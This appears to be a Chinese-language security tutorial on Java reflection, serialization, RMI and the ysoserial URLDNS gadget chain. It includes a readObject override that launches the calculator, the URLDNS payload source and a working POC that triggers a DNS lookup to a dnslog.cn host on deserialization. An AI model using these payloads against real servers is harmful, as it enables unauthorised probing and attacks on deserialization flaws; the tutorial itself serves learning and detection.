java反射机制
什么是java反射
Java反射机制是在运行状态时,对于任意一个类,都能够获取到这个类的所有属性和方法;对于任意一个对象,都能够调用它的任意一个方法和属性(包括私有的方法和属性),这种动态获取的信息以及动态调用对象的方法的功能就称为java语言的反射机制。
看起来比较抽象,下面以代码形式说明反射:
先创建一个Person类:
classPerson{
privateString name;
privateint age;
publicString toString(){
return"User{"+ "name="+ name + ", age"+ age +"}";
}
publicString getName(){
return name;
}
publicvoid setName(String name){
this.name =name;
}
publicint getAge(){
return age;
}
publicvoid setAge(int age){
this.age = age;
}
}
那么这里有一个类了,像上面说的,我们怎么获得该类的方法或者属性呢?
还是先来一个demo:下面的代码是通过反射调用了Person
类的setName
方法。
publicclassReflection02{
publicstaticvoid main(String args[]) {
try{
Person person = newPerson();
Class clazz = person.getClass();
//Class clazz = org.sd.Person.class;
//Class clazz = Class.forName("org.sd.Person");
Method method = clazz.getMethod("setName", String.class);
method.invoke(person, "Tom");
System.out.println(person);
} catch(NoSuchMethodException e) {
e.printStackTrace();
} catch(InvocationTargetException e) {
e.printStackTrace();
} catch(IllegalAccessException e) {
e.printStackTrace();
}
}
}
运行结果为:
可以看到可以执行setName
方法,并且是通过如下几行代码来实现的:
Person person = newPerson();
Class clazz = person.getClass();
Method method = clazz.getMethod("setName", String.class);
method.invoke(person, "Tom");
接下来让我们分析一下这几行代码的含义。
三种方式可获得Class类实例
1.getClass()
函数:调用某个对象的getClass方法可获得该类的Class类的实例。第二行代码正是通过这种方式获取到Class类的实例。2.forName()
静态方法:Class clazz = Class.forName("org.sd.Person");3.访问某个类的class属性,这个属性就存储着这个类对应的Class类的实例:Class clazz = org.sd.Person.class
上面介绍的三种方式皆可获取到某个类的Class类的实例,只不过在demo中使用的是getClass方法。
获取方法
Method类位于java.lang.reflect包下,在Java反射中Method类描述的是类的方法信息(包括:方法修饰符、方法名称、参数列表等等)。
java中所有的方法都是Method类型,通过getMthod()
方法可以获得某一个Class实例的某一个方法。
//代码第三行
clazz.getMethod(String name, Class[] params);//获得类的特定方法,name参数指定方法的名字,params参数指定方法的参数类型
获取方法的方式不止这一种,还有如下方法:
1.getMethods(): 获得类的public类型的方法2.getDeclaredMethods(): 获取类中所有的方法(public、protected、default、private)3.getDeclaredMethod(String name, Class[] params): 获得类的特定方法,name参数指定方法的名字,params参数指定方法的参数类型
调用方法
Method类中有一个invoke
方法,用来调用特定的方法,函数定义为:
publicObject invoke(Object obj, Object... args);
//第一个参数是方法属于的对象(如果是静态方法,则可以直接传 null)
//第二个可变参数是该方法的参数
那么代码第四行:实际上就是调用了person对象的setName方法,并传入一个参数“Tom”给setName。
java反序列化
为什么需要序列化
提到反序列化,先需要了解序列化是什么。
问自己这样一个问题:为什么需要序列化?我认为理解了为什么需要序列化也就明白了什么是序列化。
jvm一旦关闭,那么java中的对象也就销毁了。假设程序员想要持久化储存该对象或者在网络上传输,怎么办?就需要将这个对象写入磁盘里,怎么写?将一个对象进行序列化后写入。时势造英雄,正因为有这种需求,序列化应运而生了。
序列化:把对象转换为字节序列 。
反序列化:把字节序列转换为对象。
满足序列化条件
并非每一个对象都是可序列化的。能够序列化的对象有如下特征:
1.实现了java.io.Serializable
接口。2.该类的所有属性必须是可序列化的。
这里稍微细说一下,看一下Serializable接口
发现里面什么都没写,实际上Serializable接口仅仅作为一个标识。
接口没有定义任何方法,它是一个空接口。我们把这样的空接口称为“标记接口”(Marker Interface),实现了标记接口的类仅仅是给自身贴了个“标记”。
如何序列化一个对象
要序列化一个对象,首先要创建
OutputStream
对象,再将其封装在一个ObjectOutputStream
对象内,接着只需调用writeObject()
即可将对象序列化,并将其发送给OutputStream
(对象是基于字节的,因此要使用InputStream和OutputStream来继承层次结构)。
要反序列化出一个对象,需要将一个
InputStream
封装在ObjectInputStream
内,然后调用readObject()
即可。
还是先上代码:通过序列化将User("tony",18)
这个实例序列化存储(User.ser)后。又反序列化该文件获取对象,并读取该对象属性。
@Test
publicvoid test2(){
User user = newUser("tony",18);
try{
//创建一个FileOutputStream,同时会创建一个User.ser文件
FileOutputStream fos = newFileOutputStream("./User.ser");
//将该FileOutputStream封装到ObjectOutputStream中
ObjectOutputStream os = newObjectOutputStream(fos);
//调用writeObject方法,系列化对象到文件User.ser中
os.writeObject(user);
//序列化结束
System.out.println("读取数据:");
//创建FileInputStream对象
FileInputStream fis = newFileInputStream("./user.ser");
//将FileInputStream封装到ObjectInputStream
ObjectInputStreamis= newObjectInputStream(fis);
//调用readObject从user.ser中反序列化出对象。需要类型转化,默认是object
User user1 = (User)is.readObject();
user1.info();
} catch(FileNotFoundException e) {
e.printStackTrace();
} catch(IOException e) {
e.printStackTrace();
} catch(ClassNotFoundException e) {
e.printStackTrace();
}
}
}
classUserimplementsSerializable{
privateString name;
privateint age;
User(){
}
User(String name,int age){
this.name = name;
this.age = age;
}
publicString toString(){
return"User{"+ "name="+ name + ", age"+age+"}";
}
publicString getName(){
return name;
}
publicvoid setName(String name){
this.name =name;
}
publicint getAge(){
return age;
}
publicvoid setAge(int age){
this.age = age;
}
publicvoid info(){
System.out.println("Name: "+name+", Age: "+age);
}
//readObject重写
// private void readObject(ObjectInputStream input) throws IOException, ClassNotFoundException{
//System.out.println("[*]执行了自定义的readObject函数");
//Runtime.getRuntime().exec("calc");
//}
}
运行结果:
并且在上级目录写入了一个user.ser
文件
使用liunx中的xxd
命令可以看下他的内容
aced
是java序列化的一个标志,声明了该文件为序列化后的文件。像pe文件的4d5a一样,是说明该文件类型的标志。
0005
是序列化协议版本。
反序列化可能带来的危害
java中执行系统命令的方式:
publicclassExecTest{
publicstaticvoid main(String[] args) throwsException{
Runtime.getRuntime().exec("calc");
}
}
注意上一小节代码最后几行的注释部分,现在取消注释,重新运行代码:
发现执行了命令,运行了计算器。
也就是当readObject()
方法被重写的的话,反序列化该类时调用便是重写后的readObject()
方法。如果该方法书写不当的话就有可能引发恶意代码的执行。
RMI
什么是RMI
RMI全称是Remote Method Invocation
,远程⽅法调⽤,在Java在JDK1.2中实现。能够让在客户端Java虚拟机上的对象像调用本地对象一样调用服务端Java虚拟机中的对象上的方法。客户端比如说是在手机,然后服务端是在电脑;同时都有java环境,然后手机端调用电脑端那边的某个方法。
RMI依赖的默认通信协议为JRMP(Java Remote Message Protocol ,Java 远程消息交换协议),这是运行在Java RMI之下、TCP/IP之上的线路层协议。该协议为Java定制,要求服务端与客户端都为Java编写。这个协议就像HTTP协议一样,规定了客户端和服务端通信要满足的规范。在RMI传输过程中,对象实际上就是通过序列化方式进行编码传输的。(等会儿验证)
RMI分为三个主体部分:
•Client-客户端:客户端调用服务端的方法•Server-服务端:远程调用方法对象的提供者,也是代码真正执行的地方,执行结束会返回给客户端一个方法执行的结果。•Registry-注册中心:用于客户端查询要调用的方法的引用。
RMI远程调用方法为:
1.客户调用客户端辅助对象stub
上的方法2.客户端辅助对象stub
打包调用信息(变量,方法名),通过网络发送给服务端辅助对象skeleton
3.服务端辅助对象skeleton
将客户端辅助对象发送来的信息解包,找出真正被调用的方法以及该方法所在对象4.调用真正服务对象上的真正方法,并将结果返回给服务端辅助对象skeleton
5.服务端辅助对象将结果打包,发送给客户端辅助对象stub
6.客户端辅助对象将返回值解包,返回给调用者7.客户获得返回值
实现一个RMI
先实现一个接口继承java.rmi.Remote
publicinterfaceIRemoteHelloWorldextendsRemote{
publicString hello() throws java.rmi.RemoteException;
}
注册中心
publicclassRegistry{
publicstaticvoid main(String[] args){
try{
LocateRegistry.createRegistry(1099);
} catch(RemoteException e) {
e.printStackTrace();
}
while(true);
}
}
服务端
继承UnicastRemoteObject
类,并实现上面定义的接口。将Server类实例化后绑定到注册中心注册的地址。
publicclassRMIServerextendsUnicastRemoteObjectimplementsIRemoteHelloWorld{
publicRMIServer() throwsRemoteException{
}
publicString sayhello() throwsRemoteException{
System.out.println("Hello,Server");
return"Hello,Client";
}
privatevoid start() throwsException{
RMIServer rmiServer = newRMIServer();
LocateRegistry.getRegistry(1099);
Naming.rebind("rmi://127.0.0.1:1099/Hello", rmiServer);
}
publicstaticvoid main(String[] args) throwsException{
newRMIServer().start();
}
}
客户端
publicclassRMIClient{
publicstaticvoid main(String[] args) throwsMalformedURLException, NotBoundException, RemoteException{
IRemoteHelloWorld iRemoteHelloWorld = (IRemoteHelloWorld) Naming.lookup("rmi://172.20.10.5:1099/Hello");
String ret = iRemoteHelloWorld.sayhello();
System.out.println(ret);
}
}
先运行注册中心代码,然后启动Server,Client即可。
可以看到客户端可以调用服务端的方法,方法在服务端执行,并将结果返回给客户端。
上面刚刚说RMI是通过序列化在网络间传输,下面通过抓包证实。
经过两次TCP握手。第一次连接服务端(注册中心)的1099端口,之后向服务端(注册中心)发送了一个Call
,这个Call
就对应着Client在Registry中寻找Name是Hello的对象。
显然aced
是java序列化的标志,说明了是通过序列化方式进行传输。
然后服务端(注册中心)给客户端发送了一个ReturnData
,这个ReturnData
就对应着Name为Hello的对象。然后与一个新的端口49791进行第二次的TCP握手连接。
这个端口并不是无迹可寻,就存在ReturnData
中。
0x0000c27f
反序列化后为49791。
连接到服务端的49791端口才算真正的连接到服务端,此时客户端才能调用服务端的hello方法。
RMI Registry就像⼀个⽹关,他⾃⼰是不会执⾏远程⽅法的,但RMI Server可以在上⾯注册⼀个Name 到对象的绑定关系;RMI Client通过Name向RMI Registry查询,得到这个绑定关系,然后再连接RMI Server;最后,远程⽅法实际上在RMI Server上调⽤。
URLDNS链学习
URLDNS 就是ysoserial中⼀个利⽤链的名字,但准确来说,这个其实不能称作“利⽤链”。因为其参数不 是⼀个可以“利⽤”的命令,⽽仅为⼀个URL,其能触发的结果也不是命令执⾏,⽽是⼀次DNS请求。
由于URLDNS不需要依赖第三方的包,同时不限制jdk的版本,所以通常用于检测反序列化的点。
URLDNS并不能执行命令,只能发送DNS请求。
首先去看看这个链的payload长什么样子。去github上下载源码:ysoserial/URLDNS.java at master · frohoff/ysoserial · GitHub
publicclass URLDNS implementsObjectPayload<Object> {
publicObject getObject(finalString url) throwsException{
//Avoid DNS resolution during payload creation
//Since the field <code>java.net.URL.handler</code> is transient, it will not be part of the serialized payload.
URLStreamHandler handler = newSilentURLStreamHandler();
HashMap ht = newHashMap(); // HashMap that will contain the URL
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.
return ht;
}
publicstaticvoid main(finalString[] args) throwsException{
PayloadRunner.run(URLDNS.class, args);
}
/**
* <p>This instance of URLStreamHandleris used to avoid any DNS resolution while creating the URL instance.
* DNS resolution is used for vulnerability detection. Itis important not to probe the given URL prior
* using the serialized object.</p>
*
* <b>Potentialfalse negative:</b>
* <p>If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the
* second resolution.</p>
*/
staticclassSilentURLStreamHandlerextendsURLStreamHandler{
protectedURLConnection openConnection(URL u) throwsIOException{
returnnull;
}
protectedsynchronizedInetAddress getHostAddress(URL u) {
returnnull;
}
}
}
在这些代码上面还有一些说明,英语不好也就不翻译了,同时提到的还有该利用链:
GadgetChain:
HashMap.readObject()
HashMap.putVal()
HashMap.hash()
URL.hashCode()
payload中有许多注释,可以通过这些注释更好地理解。
由于利用链用到了HashMap,就简单回康师傅那里复习一下,这里简单介绍一下
Map是一个集合,本质上还是数组,HashMap是Map的子接口。该集合的结构为key-->value,两个一起称为一个Entry(jdk7),在jdk8中底层的数组为Node[]。当new HashMap()时,在jdk7中会直接创建一个长度为16的数组;jdk8中并不直接创建,而是在调用put方法时才去创建一个长度为16的数组。
下面的分析在jdk8中完成,我认为至少要了解HashMap的基本结构,key--->value
URLDNS分析
利用链说了是从HashMap.readObject()
开始,那就根据提供的利用链,一层一层进入。先找到HashMap.readObject()
:
privatevoid readObject(java.io.ObjectInputStream s)
throwsIOException, ClassNotFoundException{
// Read in the threshold (ignored), loadfactor, and any hidden stuff
s.defaultReadObject();
reinitialize();
if(loadFactor <= 0|| Float.isNaN(loadFactor))
thrownewInvalidObjectException("Illegal load factor: "+
loadFactor);
s.readInt(); // Read and ignore number of buckets
int mappings = s.readInt(); // Read number of mappings (size)
if(mappings < 0)
thrownewInvalidObjectException("Illegal mappings count: "+
mappings);
elseif(mappings > 0) { // (if zero, use defaults)
// Size the table using given load factor only if within
// range of 0.25...4.0
float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
float fc = (float)mappings / lf + 1.0f;
int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
DEFAULT_INITIAL_CAPACITY :
(fc >= MAXIMUM_CAPACITY) ?
MAXIMUM_CAPACITY :
tableSizeFor((int)fc));
float ft = (float)cap * lf;
threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
(int)ft : Integer.MAX_VALUE);
// Check Map.Entry[].class since it's the nearest public type to
// what we're actually creating.
SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);
@SuppressWarnings({"rawtypes","unchecked"})
Node<K,V>[] tab = (Node<K,V>[])newNode[cap];
table = tab;
// Read the keys and values, and put the mappings in the HashMap
for(int i = 0; i < mappings; i++) {
@SuppressWarnings("unchecked")
K key = (K) s.readObject();
@SuppressWarnings("unchecked")
V value = (V) s.readObject();
putVal(hash(key), key, value, false, false);
}
可以看到hashmap是重写了readObject方法,由于利用链第二个调用的函数是HashMap.putVal()
,其中参数又调用HashMap.hash()
,跟入到hash
方法。在该方法中看到了hashCode
方法的调用。
这里调用hashCode的对象为Object,实际传入值的时候,该对象会变成java.net.URL
,所以实际上调用的是URL的hashcode方法。
publicsynchronizedint hashCode() {
if(hashCode != -1)
return hashCode;
hashCode = handler.hashCode(this);
return hashCode;
}
如果hashCode的值为-1,那么将执行handler的hashCode方法,跟入该方法
继续跟入java.net.URLStreamHandler
的hashcode方法。
在该方法中,调用了getHostAddress
,通过注释可以看到要通过DNS查询主机的ip。
其实到这里就可以结束了,要想继续的话就在跟一层。
通过InetAddress.getByName
函数注释可以看到:如果输入的参数是主机名则查询ip,这就有一次dns查询。
所以可以使用dnslog查看是否有dns日志,如果有则说明执行了被重写后的readObject函数,那么也证明了存在可反序列化的点。
但是到这里,我总感觉还是有一些地方没搞清除,回到URLDNS。
这里通过注释可以看到:避免payload生成期间有DNS查询。跟一下SilentURLStreamHandler
类,发现他是继承URLStreamHandler
,并且重写了openConnection
和getHostAddress
方法,openConnection方法是一个抽象方法所以必须重写,重写getHostAddress则是为了防⽌在⽣成Payload的时候也执⾏了URL请求和DNS查询。执行getHostAddress时直接返回null,避免进一步调用getByName()
。
当我视图说服自己时,发现这里还有一个问题:为什么要防⽌在⽣成Payload的时候也执⾏了URL请求和DNS查询。
回到hashMap.readObject
方法
hash方法中参数key的来源为readObject读取出的,那么意味着在序列化WriteObject方法时就已经将这个值写入。
跟进hashMap.WriteObject()
跟入internalWriteEntries
,可以看到这里写入的key为tab数组中抽出来的,而tab的值即HashMap中table的值。
想要修改table的值,就需要调用HashMap.put()
方法。
但是HashMap.put()
方法是会触发一次dns请求的,这就解释了为什么需要防⽌在⽣成Payload的时候也执⾏了URL请求和DNS查询的问题。但这并不是必须的。
除了重写getHostAddress
方法这里还有一个办法,看到URL.hashCode()
如果设置hashCode的值不为-1,那么将无法进入到URLStreamHandler.hashCode()
函数中,也就无法执行DNS查询。
那么这下大致就理清楚了,gadget为:
1.HashMap->readObject()2.HashMap->hash()3.URL->hashCode()4.URLStreamHandler->hashCode()5.URLStreamHandler->getHostAddress()6.InetAddress->getByName()
最后还是复现一下。一个简单的POC:
publicclassUrlDemo{
publicstaticvoid main(String[] args) throwsException{
HashMap map = newHashMap();
URL url = new URL("http://5i6qar.dnslog.cn");
Field f = Class.forName("java.net.URL").getDeclaredField("hashCode");
f.setAccessible(true); // 绕过Java语言权限控制检查的权限
f.set(url,123); //设置hashCode的值不为-1,无法进行DNS查询
map.put(url,"Tom");
f.set(url,-1); //保证反序列化时可以进行DNS查询
try{
FileOutputStream fileOutputStream = newFileOutputStream("./urldns.ser");
ObjectOutputStream outputStream = newObjectOutputStream(fileOutputStream);
outputStream.writeObject(map);
outputStream.close();
fileOutputStream.close();
FileInputStream fileInputStream = newFileInputStream("./urldns.ser");
ObjectInputStream inputStream = newObjectInputStream(fileInputStream);
inputStream.readObject();
inputStream.close();
fileInputStream.close();
}
catch(Exception e){
e.printStackTrace();
}
}
}
推荐阅读
java安全漫谈反射篇(1)
java安全漫谈RMI篇(1)
javasec
https://github.com/Maskhe/javasec
Java安全之反序列化篇
https://paper.seebug.org/1242/
点赞 在看 转发
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论